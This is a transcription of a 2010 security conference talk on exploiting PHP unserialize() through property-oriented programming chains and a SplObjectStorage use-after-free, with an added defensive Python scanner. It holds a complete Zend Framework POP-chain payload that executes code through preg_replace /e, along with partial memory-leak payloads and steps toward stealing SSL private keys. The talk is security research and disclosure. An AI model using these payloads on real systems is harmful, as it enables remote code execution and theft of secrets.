Utilizing Code Reuse/ROP In PHP Application Exploits - OWASP

Transcription

http://www.sektioneins.de

Utilizing Code Reuse/ROP in PHP Application Exploits
Stefan Esser <stefan.esser@sektioneins.de>
BlackHat USA 2010, Las Vegas, Nevada

Who am I?
- Stefan Esser from Cologne/Germany
- Information Security since 1998
- PHP Core Developer since 2001
- Suhosin / Hardened-PHP 2004
- Month of PHP Bugs 2007 / Month of PHP Security 2010
- Head of Research & Development at SektionEins GmbH

Stefan Esser, Utilizing Code Reuse/ROP in PHP Application Exploits, July 2010

Part I: Introduction

Introduction (I)
Code Reuse / Return Oriented Programming
- shellcode is not injected into the application
- instead the application's code flow is hijacked and redirected
- pieces of already available code are executed in an attacker defined order
- reordered bits of code do exactly what the attacker wants

Introduction (II)
Research into Code Reuse / Return Oriented Programming
- consumer architectures: x86, amd64, sparc, ppc, arm
- intermediate architectures: REIL
- special architectures: voting systems
- no research yet for web applications

Introduction (III)
Classification
- Code Reuse
- Return Oriented Programming
- Return To Libc
- ...?
(diagram: Code Reuse at the top, with ROP, Return To Libc and a "?" beneath it)

Introduction (IV)
Return Oriented Programming / Return To Libc
- based on hijacking the call stack
- allows returning into arbitrary code
- gadgets: useful code followed by a return
- full control over the stack
(diagram: a hijacked stack holding return addresses and arguments such as 0x40123456, 0x10, 0x40142552, 0x40423742, 0x40123455, 0x17, 0xDEADBEEF, 0xDEADBEEF, 0x40441122, with the addresses pointing at gadgets like "pop ecx; ret", "mov eax, ecx; ret", "add eax, ecx; ret", "pop edx; pop ebx; pop ecx; ret" and "int 0x80; ret")

Introduction (V)
Return Oriented Programming is not possible at the PHP level
- callstack is spread over real stack, heap and data segment
- ROP would require control over multiple places at the same time
- normally overflows only allow to hijack one place at once
- PHP bytecode is at unknown positions in the heap

Introduction (VI)
(diagram repeated: Code Reuse with ROP, Return To Libc and a "?" beneath it)

Introduction (VII)
(diagram: the "?" is filled in; Code Reuse now covers ROP, Return To Libc and Property Oriented Programming (POP))

Part II: Property Oriented Programming

Property Oriented Programming
- when the callstack is not controllable another code reuse technique is required
- new software is usually object oriented
- objects call methods of other objects stored in their properties
- replacing or overwriting objects and properties allows another form of code reuse

Property Oriented Programming in PHP
- some limitations: can only call the start of methods
- cannot just overwrite some object in memory
- need a way to create objects and fill all their properties: unserialize()

Part III: PHP's unserialize()

unserialize()
- allows to deserialize serialized PHP variables
- supports most PHP variable types: integers / floats / boolean, strings / arrays / objects, references
- often exposed to user input
- many vulnerabilities in the past

unserialize()
- deserializing objects allows to control all properties: public, protected, private
- but not the bytecode!!!
- however deserialized objects get woken up via __wakeup() and later destroyed via __destruct()
- already existing code gets executed

unserialize() keeps a table of all variables created during deserialization (the var table) in order to support references.

The slides step through filling the var table while deserializing a sample payload whose surviving tail reads ...:3;r:3;i:4;O:8:"my[...]ectStorage":14:{x:i:0;m:a:0:{}}:
- slot 1: array (the outer container takes its slot before its elements)
- slot 2: integer 0 (key 0)
- slot 3: float 2.0 (key 1)
- slot 4: string "ABCD" (key 2)
- slot 5: float 2.0 (key 3; the r:3 reference copies slot 3)
- slot 6: object myClass (key 4)
- slot 7: property a of myClass
- slot 8: property b of myClass, NULL; once all properties are set, myClass::__wakeup() is called
- slot 9: object SplObjectStorage (key 5)

Part IV: Usable Vulnerability Classes

When is an application vulnerable?
- An application is vulnerable if malicious input is passed to unserialize()
- Deserialization of user input is the most obvious vulnerability cause
- but PHP applications use unserialize() in many different ways
- Other vulnerability classes can result in unserialize() vulnerabilities

Deserialization of User Input
- Applications use serialize() / unserialize() to transfer complex data
- Used in hidden HTML form fields and HTTP cookies
- Easy way to transfer arrays
- Developers are unaware of code execution
- Was quite harmless in PHP 4 days (aside from low level exploits)

    if (!isset($_REQUEST['printpages']) && !isset($_REQUEST['printstructures'])) {
        ...
    } else {
        $printpages = unserialize(urldecode($_REQUEST["printpages"]));
        $printstructures = unserialize(urldecode($_REQUEST['printstructures']));
    }
    ...
    $form_printpages = urlencode(serialize($printpages));
    $smarty->assign_by_ref('form_printpages', $form_printpages);
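Added example (not code from the talk or from any project it names): a Python scanner that parses PHP's serialize() format the way unserialize() does, reserving a 1-based var-table slot per value so r:/R: references resolve, and reports every class instantiated and every reference, so that cookie, form-field or cache input can be refused before it reaches unserialize(). It serves the var-table walkthrough above and this slide's user-input case; the sample inputs, the stdClass name and the reason strings are constructed.

```python
"""Pre-flight scanner for PHP serialize() data (added example, not code from the talk).
Walks the grammar the way unserialize() does, keeping the 1-based variable table so
r:/R: references resolve, and reports the objects and references it meets."""
import re
from types import SimpleNamespace

_SCALAR = {b"N": lambda _: None, b"b": lambda r: r == b"1", b"i": int, b"d": float}

def _lit(data, pos, lit):
    if not data.startswith(lit, pos):
        raise ValueError(f"expected {lit!r} at offset {pos}")
    return pos + len(lit)

def _int(data, pos, term):
    m = re.compile(rb"-?\d+").match(data, pos)
    if not m:
        raise ValueError(f"expected integer at offset {pos}")
    return int(m.group()), _lit(data, m.end(), term)

def _bytes(data, pos, term):                # <len>:"<raw bytes>" -- counts bytes, NULs included
    n, pos = _int(data, pos, b':"')
    if len(data) - pos < n:
        raise ValueError(f"string at offset {pos} shorter than declared")
    return data[pos:pos + n], _lit(data, pos + n, b'"' + term)

def _value(data, pos, rep):
    """Parse one value; every value except an R: reference occupies a var-table slot."""
    tag, slot = data[pos:pos + 1], len(rep.var_table)
    if tag != b"R":
        rep.var_table.append(None)          # slot reserved before the children, as in PHP
    if tag in _SCALAR:                      # N;  b:1;  i:42;  d:2.0;
        end = data.index(b";", pos)
        val, pos = _SCALAR[tag](data[pos + 2:end]), end + 1
    elif tag == b"s":
        val, pos = _bytes(data, pos + 2, b";")
    elif tag in (b"a", b"O"):               # a:<n>:{k;v ...}   O:<len>:"Class":<n>:{k;v ...}
        pos += 2
        if tag == b"O":
            name, pos = _bytes(data, pos, b":")
            rep.classes.append(name.decode("latin-1"))
        count, pos = _int(data, pos, b":{")
        val = {}
        for _ in range(count):              # keys (i: or s:) take no var-table slot
            key, pos = (_int if data[pos:pos + 1] == b"i" else _bytes)(data, pos + 2, b";")
            val[key], pos = _value(data, pos, rep)
        pos = _lit(data, pos, b"}")
    elif tag == b"C":                       # custom format (e.g. SplObjectStorage): always a class
        raise ValueError(f"C: custom-serialized object at offset {pos}")
    elif tag in (b"r", b"R"):
        n, pos = _int(data, pos + 2, b";")
        if not 1 <= n <= slot:              # only slots that already exist may be referenced
            raise ValueError(f"{tag.decode()}:{n} points outside the var table")
        val = rep.var_table[n - 1]
        rep.references.append((tag.decode(), n))
    else:
        raise ValueError(f"unknown tag {tag!r} at offset {pos}")
    if tag != b"R":
        rep.var_table[slot] = val
    return val, pos

def check(data, allowed_classes=frozenset()):
    """Return (report, reasons to reject before unserialize()); no reasons means clean."""
    rep = SimpleNamespace(classes=[], references=[], var_table=[])
    try:
        _value(data, 0, rep)
    except (ValueError, RecursionError) as exc:   # RecursionError: absurdly deep nesting
        return rep, [f"rejected: {exc}"]
    problems = [f"instantiates {c}" for c in rep.classes if c not in allowed_classes]
    if rep.references:
        problems.append(f"{len(rep.references)} reference(s)")
    return rep, problems

# Constructed samples: a harmless array, and one smuggling an object plus a reference back to it.
BENIGN = b'a:2:{i:0;s:4:"ABCD";s:3:"key";d:2.0;}'
SUSPECT = b'a:3:{i:0;i:1;i:1;O:8:"stdClass":1:{s:3:"foo";s:3:"bar";}i:2;r:3;}'
```

check() returns the report alongside the reasons, so one call can feed a log line or a hard reject; on PHP 7 and later the allowed_classes option of unserialize() enforces the class allow-list natively, while this scanner also covers older PHP and offline log analysis.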

Deserialization of Cache Files
- Applications use serialize() / unserialize() to store variables in caching files
- These files are not supposed to be changeable by the user
- Cache file directory usually very near the directory for file uploads
- File upload vulnerabilities can result in caching files being overwritten
- File uploads outside of document root can still result in interesting attacks

    <?php
    class Zend_Cache_Core
    {
        public function load($id, $doNotTestCacheValidity = false, $doNotUnserialize = false)
        {
            if (!$this->_options['caching']) {
                return false;
            }
            $id = $this->_id($id); // cache id may need prefix
            $this->_lastId = $id;
            self::_validateIdOrTag($id);
            $data = $this->_backend->load($id, $doNotTestCacheValidity);
            if ($data === false) {
                // no cache available
                return false;
            }
            if ((!$doNotUnserialize) && $this->_options['automatic_serialization']) {
                // we need to unserialize before sending the result
                return unserialize($data);
            }
            return $data;
        }
    }

Deserialization of Network Data
- Applications use serialize() / unserialize() for public web APIs
- Well known example: WordPress
- when the API is using the plaintext HTTP protocol it is vulnerable to MITM
- HTTP man-in-the-middle to perform attacks against unserialize()

    $options = array(
        'timeout'    => ( ( defined('DOING_CRON') && DOING_CRON ) ? 30 : 3),
        'body'       => array( 'plugins' => serialize( $to_send ) ),
        'user-agent' => 'WordPress/' . $wp_version . '; ' . get_bloginfo( 'url' )
    );
    $raw_response = wp_remote_post('http://api.wordpress.org/plugins/update-check/1.0/', $options);
    if ( is_wp_error( $raw_response ) )
        return false;
    if ( 200 != $raw_response['response']['code'] )
        return false;
    $response = unserialize( $raw_response['body'] );

Deserialization of Database Fields
- Applications / Frameworks use serialize() / unserialize() to store more complex data in database fields
- Therefore SQL injection vulnerabilities might allow attackers to control what is deserialized
- Database APIs like PDO MySQL allow stacked SQL queries

    public function jsonGetFavoritesProjectsAction()
    {
        $setting = Phprojekt_Loader::getLibraryClass('Phprojekt_Setting');
        $setting->setModule('Timecard');
        $favorites = $setting->getSetting('favorites');
        if (!empty($favorites)) {
            $favorites = unserialize($favorites);
        } else {
            $favorites = array();
        }
        ...
    }

Session Deserialization Weakness
- If an attacker has control over the start of a session key name and the associated value he can exploit a vulnerability in the session extension
- MOPS-2010-060 is a weakness that allows to inject arbitrary serialized values into the session by confusing the deserializer with a !
- This allows to attack unserialize() through the session deserializer

    <?php
    // Start the session
    session_start();
    // Full Control
    $_SESSION = array_merge($_SESSION, $_POST);
    // Just controlling one session entry
    $prefix = $_REQUEST['prefix'];
    $_SESSION[$prefix.'_foo'] = $_REQUEST[$prefix];
    ?>

Part V: Exploitability Requirements

When is an application exploitable?
- An application is exploitable if it is deserializing user input and contains classes usable in a POP chain
- A class is usable in a POP chain
  - if it is available during unserialize()
  - if it can start a POP chain
  - if it can transfer execution in a POP chain
  - if it contains interesting operations

Class Availability
- POP attacks can only use classes available during unserialize()
- unserialize() can deserialize any valid classname, but unknown classes will be incomplete and unusable for POP
- PHP only knows about classes defined in already included files
- some PHP applications register an __autoload() function which often allows all application classes to be used

POP Chain: Starting the Chain
- a class can be the start of a POP chain if it has an interesting object method that is automatically executed by PHP
- Usually this is __wakeup() or __destruct()
- but other magic methods are possible too: __toString(), __call(), __set(), __get()

    <?php
    class popstarter
    {
        function __destruct()
        {
            ...
        }
    }
    ?>

POP Chain: Execution Flow Transfer
- a class can be interesting for a POP chain if it transfers execution to an object inside its properties
  - by invoking a method
  - by invoking a __toString() conversion of the other object
  - by invoking another magic method of the object

    <?php
    class exectransfer
    {
        function methodA()
        {
            $this->prop2->methodB();             // method call on the object in prop2
            $this->prop3->data = $this->prop4;   // may trigger __set() on the object in prop3
            return 'data: ' . $this->prop1;      // may trigger __toString() on the object in prop1
        }
    }
    ?>

POP Chain: Interesting Operations
- The end of a POP chain requires a class method that contains an interesting operation
- Interesting operations are: file access, database access, session access, mail access, dynamic code evaluation, dynamic code inclusion, ...

    <?php
    class operation
    {
        function methodB()
        {
            $message = file_get_contents($this->tempfile);
            mail($this->to, $this->subject, $message);
            unlink($this->tempfile);
        }
    }
    ?>

Part VI: Examples

Zend_Log

    class Zend_Log
    {
        ...
        /**
         * @var array of Zend_Log_Writer_Abstract
         */
        protected $_writers = array();
        ...
        /**
         * Class destructor. Shutdown log writers
         *
         * @return void
         */
        public function __destruct()
        {
            foreach($this->_writers as $writer) {
                $writer->shutdown();
            }
        }
    }

(diagram: Zend_Log object with its _writers property)

Zend_Log_Writer_Mail

    class Zend_Log_Writer_Mail extends Zend_Log_Writer_Abstract
    {
        public function shutdown()
        {
            if (empty($this->_eventsToMail)) {
                return;
            }
            if ($this->_subjectPrependText !== null) {
                $numEntries = $this->...;
                $this->_mail->setSubject("{$this->_subjectPrependText} ({$numEntries})");
            }
            $this->_mail->setBodyText(implode('', $this->_eventsToMail));
            // If a Zend_Layout instance is being used, set its "events"
            // value to the lines formatted for use with the layout.
            if ($this->_layout) {
                // Set the required "messages" value for the layout. Here we
                // are assuming that the layout is for use with HTML.
                $this->_layout->events = implode('', $this->_layoutEventsToMail);
                // If an exception occurs during rendering, convert it to a notice
                // so we can avoid an exception thrown without a stack frame.
                try {
                    $this->_mail->setBodyHtml($this->_layout->render());
                } catch (Exception $e) {
                    trigger_error(...);
                }
            }
            ...
        }
    }

(diagram: Zend_Log_Writer_Mail object with its _eventsToMail, _subjectPrependText, _mail and _layout properties)

Zend_Layout

    class Zend_Layout
    {
        ...
        protected $_inflector;
        protected $_inflectorEnabled = true;
        protected $_layout = 'layout';
        ...
        public function render($name = null)
        {
            if (null === $name) {
                $name = $this->getLayout();
            }
            if ($this->inflectorEnabled() && (null !== ($inflector = $this->getInflector()))) {
                $name = $this->_inflector->filter(array('script' => $name));
            }
            ...
        }
    }

(diagram: Zend_Layout object with its _inflector, _inflectorEnabled and _layout properties)

Zend_Filter_PregReplace

    class Zend_Filter_PregReplace implements Zend_Filter_Interface
    {
        protected $_matchPattern = null;
        protected $_replacement = '';
        ...
        public function filter($value)
        {
            if ($this->_matchPattern == null) {
                require_once 'Zend/Filter/Exception.php';
                throw new Zend_Filter_Exception(get_class($this) . ' does ...');
            }
            return preg_replace($this->_matchPattern, $this->_replacement, $value);
        }
    }

(diagram: Zend_Filter_PregReplace object with its _matchPattern and _replacement properties)

Putting it all together

(diagram of the chain)
- Zend_Log: _writers = array(Zend_Log_Writer_Mail)
- Zend_Log_Writer_Mail: _eventsToMail = array(1), _subjectPrependText = null, _mail = Zend_Mail, _layout = Zend_Layout, _layoutEventsToMail = array(1)
- Zend_Layout: _inflector = Zend_Filter_PregReplace, _inflectorEnabled = true, _layout = "layout"
- Zend_Filter_PregReplace: _matchPattern = "/(.*)/e", _replacement = "phpinfo().die()"

    O:8:"Zend_Log":1:{s:11:"\0*\0_writers";a:1:{i:0;O:20:"Zend_Log_Writer_Mail":5:{s:16:"\0*\0_eventsToMail";a:1:{i:0;i:1;}s:22:"\0*\0_layoutEventsToMail";a:0:{}s:8:"\0*\0_mail";O:9:"Zend_Mail":0:{}s:10:"\0*\0_layout";O:11:"Zend_Layout":3:{s:13:"\0*\0_inflector";O:23:"Zend_Filter_PregReplace":2:{s:16:"\0*\0_matchPattern";s:7:"/(.*)/e";s:15:"\0*\0_replacement";s:15:"phpinfo().die()";}s:20:"\0*\0_inflectorEnabled";b:1;s:10:"\0*\0_layout";s:6:"layout";}s:22:"\0*\0_subjectPrependText";N;}}}

Part VII: Vulnerability in unserialize()

Vulnerability in unserialize()
- property oriented exploitation is often not possible
- applications unserialize() user input but do not have interesting objects
- however unserialize() is a parser and parsers tend to be vulnerable
- indeed there is a use-after-free vulnerability in SplObjectStorage

SplObjectStorage
- provides an object set in PHP 5.2

    <?php
    $x = new SplObjectStorage();
    $x->attach(new Alpha());
    $x->attach(new Beta());
    echo serialize($x);
    ?>

  which serializes to ...ha":0:{};O:4:"Beta":0:{};m:a:0:{}}

- provides a map from objects to data in PHP 5.3

    <?php
    $x = new SplObjectStorage();
    $x->attach(new Alpha(), 123);
    $x->attach(new Beta(), 456);
    echo serialize($x);
    ?>

  which serializes to ...:0:{},i:123;;O:4:"Beta":0:{},i:456;;m:a:0:{}}

Object Set/Map Index
- the key to the object set / map is derived from the object value

    zend_object_value zvalue;
    memset(&zvalue, 0, sizeof(zend_object_value));
    zvalue.handle = Z_OBJ_HANDLE_P(obj);
    zvalue.handlers = Z_OBJ_HT_P(obj);
    zend_hash_update(&intern->storage, (char*)&zvalue, sizeof(zend_object_value),
                     &element, sizeof(spl_SplObjectStorageElement), NULL);

    typedef struct _zend_object_value {
        zend_object_handle    handle;
        zend_object_handlers *handlers;
    } zend_object_value;

Vulnerability in PHP 5.3.x
- references allow to attach the same object again
- in PHP 5.3.x this will destruct the previously stored extra data
- destruction of the extra data will not touch the internal var table
- references allow to still access/use the freed PHP variables
- use-after-free vulnerability allows to info leak or execute code

Vulnerable Applications
- the discussed vulnerability allows arbitrary code execution in any PHP application unserializing user input
- but in order to exploit it nicely the PHP application should re-serialize and echo the result
- both is quite common in widespread PHP applications
- e.g. TikiWiki 4.2

    if (!isset($_REQUEST['printpages']) && !isset($_REQUEST['printstructures'])) {
        ...
    } else {
        $printpages = unserialize(urldecode($_REQUEST["printpages"]));
        $printstructures = unserialize(urldecode($_REQUEST['printstructures']));
    }
    ...
    $form_printpages = urlencode(serialize($printpages));
    $smarty->assign_by_ref('form_printpages', $form_printpages);

Part VIII: Simple Information Leaks via unserialize()

DWORD Size?
- for the following steps it is required to know if the target is 32 bit or 64 bit
- we can detect the bit size by sending integers larger than 32 bit
- sending: i:11111111111;
- answer:
  - 64 bit PHP: i:11111111111;
  - 32 bit PHP: i:-1773790777;
  - 32 bit PHP: d:11111111111;

PHP 5.2.x vs. PHP 5.3.x
- as demonstrated the exploit is different for PHP 5.2.x and 5.3.x
- we can detect a difference in the ArrayObject implementation
- sending: O:11:"ArrayObject":0:{}
- answer:
  - PHP 5.2.x: O:11:"ArrayObject":0:{}
  - PHP 5.3.x: (different output)

SplOb>jectStorage Version
- bugfix in the latest versions of PHP 5.2.x and PHP 5.3.x
- the stored objects counter is no longer put in the var table
- can be detected by references
- sending: ...:2;i:2;i:3;r:4;}}
- answer:
  - PHP 5.2.12: ...i:1;i:2;i:2;i:3;i:2;}}
  - PHP 5.2.13: ...i:1;i:2;i:2;i:3;i:1;}}

Part IX: Leak-After-Free Attacks

Endianness?
- for portability we need to detect the endianness remotely
- no simple info leak available
- we need a leak-after-free attack for this

Creating a fake integer ZVAL
- we construct a string that represents an integer ZVAL
- 32 bit integer ZVAL: 00 01 00 00 41 41 41 41 00 01 01 00 01 00
  (fields: integer value, reference counter, type)
- the string is a valid integer no matter what endianness
- reference counter is chosen to be not zero or one (0x101)
- type is set to integer variable (0x01)
- value will be 0x100 for little endian and 0x10000 for big endian
- when sent to the server the returned value determines endianness

Endianness Unserialize Payload
- orange numbers are not valid because serialized strings were modified to enhance visibility
- create an array of integer variables
- free the array
- create a fake ZVAL string which will reuse the memory
- create a reference to one of the already freed integer variables
- the reference will point to our fake ZVAL
- payload: ...1\x00BBCCC";i:2;r:11;}}}}

Endianness Payload Reply
- for little endian systems the reply will end in ...\01\x00BBCCC";i:2;i:256;}}}
- and for big endian systems in ...\01\x00BBCCC";i:2;i:65536;}}}

Leak Arbitrary Memory?
- we want a really stable, portable, non-crashing exploit
- this requires more info leaks: it would be nice to leak arbitrary memory
- is that possible with a leak-after-free attack? Yes it is!

Creating a fake string ZVAL
- we construct a string that represents a string ZVAL
- 32 bit string ZVAL: 18 21 34 B7 00 04 00 00 00 01 01 00 06 00
  (fields: string pointer, string length, reference counter, type)
- our fake string ZVAL's string pointer points where we want to leak (0xB7342118)
- length is set to 1024 (0x400)
- reference counter is chosen to be not zero or one (0x101)
- type is set to string variable (0x06)
- when sent to the server the returned value contains 1024 leaked bytes

Arbitrary Leak Unserialize Payload
- create an array of integer variables
- free the array
- create a fake ZVAL string which will reuse the memory
- create a reference to one of the already freed integer variables
- the reference will point to our fake string
- payload: ...\01\00\06\x00BBCCC";i:2;r:11;}}}}

Arbitrary Leak Response
- the response will look a lot like ...\00\01\01\00\06\00BBCCC";i:2;s:1024:"<1024 leaked bytes>";}}}

Starting Point?
- wait a second... how do we know where to start when leaking memory?
- can we leak some PHP addresses?
- is that possible with a leak-after-free attack? Yes it is!

Creating a fake string ZVAL
- we again construct a string that represents a string ZVAL
- 32 bit string ZVAL: 41 41 41 41 00 04 00 00 00 01 01 00 06 00
  (fields: string pointer, string length, reference counter, type)
- our fake string ZVAL's pointer points anywhere (0x41414141): it will be overwritten by a free
- length is set to 1024 (0x400)
- reference counter is chosen to be not zero or one (0x101)
- type is set to string variable (0x06)
- when sent to the server the returned value contains 1024 leaked bytes

Starting Point Leak Unserialize Payload
- create an array of integer variables to allocate memory
- create another array of integer variables and free the array
- create an array which mixes our fake ZVAL strings and objects
- free that array
- create a reference to one of the already freed integer variables
- the reference will point to our already freed fake string ZVAL
- the string pointer of the fake string was overwritten by the memory cache
- payload: ...\01\00\06\x00BBCCC";i:109;O:8:"stdclass":0:{}i:9; 7;}}}}

Starting Point Leak Response
- the response will contain the leaked 1024 bytes of memory starting from an already freed address
- we search for freed object ZVALs in the reply
- 32 bit object ZVAL: 41 41 41 41 20 12 34 B7 00 00 00 00 05 00
  (fields: object handle, overwritten by free; object handlers; reference counter; type; this is the pattern to search for)
- the object handlers address is a pointer into PHP's data segment
- we can leak memory at this address to get a list of pointers into the code segment

Where to go from here?
- having pointers into the code segment and an arbitrary memory info leak we can...
- scan backward for the ELF / PE / ... executable header
- remotely steal the PHP binary and all its data
- look up any symbol in the PHP binary
- find other interesting webserver modules (and their executable headers) and steal their data (e.g. the mod_ssl private SSL key)
- use the gathered data for a remote code execution exploit
